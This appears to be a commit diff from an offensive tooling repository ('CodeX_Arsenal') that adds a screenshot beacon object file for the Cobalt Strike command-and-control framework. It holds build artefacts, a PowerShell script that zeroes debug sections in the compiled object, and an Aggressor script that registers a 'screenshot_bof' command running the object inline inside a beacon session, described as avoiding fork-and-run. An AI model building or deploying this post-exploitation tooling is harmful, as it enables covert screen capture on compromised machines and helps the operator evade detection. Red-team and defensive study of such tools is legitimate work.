c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\source.obj
|
||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\bin\bof\screenshotbof.x86.obj
|
||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.command.1.tlog
|
||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.read.1.tlog
|
||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.write.1.tlog
|
|
@ -0,0 +1,7 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project>
|
||||
<ProjectOutputs>C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\bin\BOF\ScreenshotBOFx32</ProjectOutputs>
|
||||
<ContentFiles></ContentFiles>
|
||||
<SatelliteDlls></SatelliteDlls>
|
||||
<NonRecipeFileRefs></NonRecipeFileRefs>
|
||||
</Project>
|
Binary file not shown.
|
@ -0,0 +1,127 @@
|
|||
function strip-bof {
|
||||
<#
|
||||
.SYNOPSIS
|
||||
Removes debug symbols from a beacon object file
|
||||
|
||||
Heavily dependent on code by Matthew Graeber (@mattifestation)
|
||||
Original code: https://www.powershellgallery.com/packages/PowerSploit/1.0.0.0/Content/PETools%5CGet-ObjDump.ps1
|
||||
Author: Yasser Alhazmi (@yas_o_h)
|
||||
License: BSD 3-Clause
|
||||
|
||||
.PARAMETER Path
|
||||
|
||||
Specifies a path to one or more object file locations.
|
||||
|
||||
.EXAMPLE
|
||||
|
||||
C:\PS>strip-bof -Path main.obj
|
||||
|
||||
#>
|
||||
|
||||
[CmdletBinding()] Param (
|
||||
[Parameter(Position = 0, Mandatory = $True)]
|
||||
[ValidateScript({ Test-Path $_ })]
|
||||
[String]
|
||||
$Path
|
||||
)
|
||||
|
||||
|
||||
$Code = @'
|
||||
using System;
|
||||
using System.IO;
|
||||
using System.Text;
|
||||
|
||||
namespace COFF
|
||||
{
|
||||
|
||||
|
||||
public class SECTION_HEADER
|
||||
{
|
||||
public string Name;
|
||||
public uint PhysicalAddress;
|
||||
public uint VirtualSize;
|
||||
public uint VirtualAddress;
|
||||
public uint SizeOfRawData;
|
||||
public uint PointerToRawData;
|
||||
public uint PointerToRelocations;
|
||||
public uint PointerToLinenumbers;
|
||||
public ushort NumberOfRelocations;
|
||||
public ushort NumberOfLinenumbers;
|
||||
public uint Characteristics;
|
||||
public Byte[] RawData;
|
||||
|
||||
public SECTION_HEADER(BinaryReader br)
|
||||
{
|
||||
this.Name = Encoding.UTF8.GetString(br.ReadBytes(8)).Split((Char) 0)[0];
|
||||
this.PhysicalAddress = br.ReadUInt32();
|
||||
this.VirtualSize = this.PhysicalAddress;
|
||||
this.VirtualAddress = br.ReadUInt32();
|
||||
this.SizeOfRawData = br.ReadUInt32();
|
||||
this.PointerToRawData = br.ReadUInt32();
|
||||
this.PointerToRelocations = br.ReadUInt32();
|
||||
this.PointerToLinenumbers = br.ReadUInt32();
|
||||
this.NumberOfRelocations = br.ReadUInt16();
|
||||
this.NumberOfLinenumbers = br.ReadUInt16();
|
||||
this.Characteristics = br.ReadUInt32();
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
public class HEADER
|
||||
{
|
||||
public ushort Machine;
|
||||
public ushort NumberOfSections;
|
||||
public uint TimeDateStamp;
|
||||
public uint PointerToSymbolTable;
|
||||
public uint NumberOfSymbols;
|
||||
public ushort SizeOfOptionalHeader;
|
||||
public ushort Characteristics;
|
||||
|
||||
public HEADER(BinaryReader br)
|
||||
{
|
||||
this.Machine = br.ReadUInt16();
|
||||
this.NumberOfSections = br.ReadUInt16();
|
||||
this.TimeDateStamp = br.ReadUInt32();
|
||||
this.PointerToSymbolTable = br.ReadUInt32();
|
||||
this.NumberOfSymbols = br.ReadUInt32();
|
||||
this.SizeOfOptionalHeader = br.ReadUInt16();
|
||||
this.Characteristics = br.ReadUInt16();
|
||||
}
|
||||
}
|
||||
}
|
||||
'@
|
||||
|
||||
Add-Type -TypeDefinition $Code
|
||||
Write-Host "enumerating sections..."
|
||||
try {
|
||||
$FileStream = [IO.File]::OpenRead($Path)
|
||||
$BinaryReader = New-Object IO.BinaryReader($FileStream)
|
||||
$CoffHeader = New-Object COFF.HEADER($BinaryReader)
|
||||
|
||||
# Parse section headers
|
||||
$SectionHeaders = New-Object COFF.SECTION_HEADER[]($CoffHeader.NumberOfSections)
|
||||
|
||||
for ($i = 0; $i -lt $CoffHeader.NumberOfSections; $i++)
|
||||
{
|
||||
$SectionHeaders[$i] = New-Object COFF.SECTION_HEADER($BinaryReader)
|
||||
|
||||
if($SectionHeaders[$i].Name.Contains("debug")){
|
||||
Write-Host "found debug section.. zeroing it..."
|
||||
$FileStream.Close();
|
||||
$FileStream2 = [IO.File]::OpenWrite($Path)
|
||||
$FileStream2.Seek($SectionHeaders[$i].PointerToRawData, 'Begin') | Out-Null
|
||||
for($x = 0; $x -lt $SectionHeaders[$i].SizeOfRawData; $x++){
|
||||
$FileStream2.WriteByte(0)
|
||||
}
|
||||
Write-Host "closing stream...";
|
||||
$FileStream2.Close();
|
||||
Write-Host "done!";
|
||||
return;
|
||||
}
|
||||
}
|
||||
} catch {
|
||||
Add-Type -AssemblyName PresentationFramework
|
||||
[System.Windows.MessageBox]::Show("error stripping debug symbols: " + $_.ToString());
|
||||
return;
|
||||
}
|
||||
}
|
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,21 @@
|
|||
#Register command
|
||||
beacon_command_register(
|
||||
"screenshot_bof",
|
||||
"Alternative screenshot capability that does not do fork n run",
|
||||
"Synopsis: screenshot_bof"
|
||||
);
|
||||
|
||||
alias screenshot_bof {
|
||||
local('$barch $handle $data $args $target_pid');
|
||||
println(@_);
|
||||
# figure out the arch of this session
|
||||
$barch = barch($1);
|
||||
# read in the right BOF file
|
||||
$handle = openf(script_resource("screenshotBOF. $+ $barch $+ .obj"));
|
||||
$data = readb($handle, -1);
|
||||
closef($handle);
|
||||
# announce what we're doing
|
||||
btask($1, "Running screenshot BOF by (@codex_tf2)");
|
||||
# execute it.
|
||||
beacon_inline_execute($1, $data, "go", $args);
|
||||
}
|
Loading…
Reference in New Issue